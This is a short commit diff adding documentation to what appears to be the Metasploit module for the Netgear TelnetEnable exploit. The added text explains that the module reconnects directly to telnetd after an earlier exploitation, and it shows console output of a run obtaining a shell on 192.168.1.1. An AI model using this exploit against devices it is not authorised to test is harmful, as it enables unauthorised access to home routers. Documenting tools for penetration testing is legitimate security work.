Add note about directly connecting to telnetd

GSoC/Meterpreter_Web_Console
William Vu 2018-03-02 07:24:17 -06:00
parent b6d563e2a3
commit 0c0f00941b
1 changed files with 12 additions and 0 deletions

View File

@ -113,3 +113,15 @@ uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```
If you've already exploited TelnetEnable, the exploit will attempt to
connect to `telnetd` directly. This saves us from sending the magic
packet again.
```
msf5 exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetd on TCP
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
```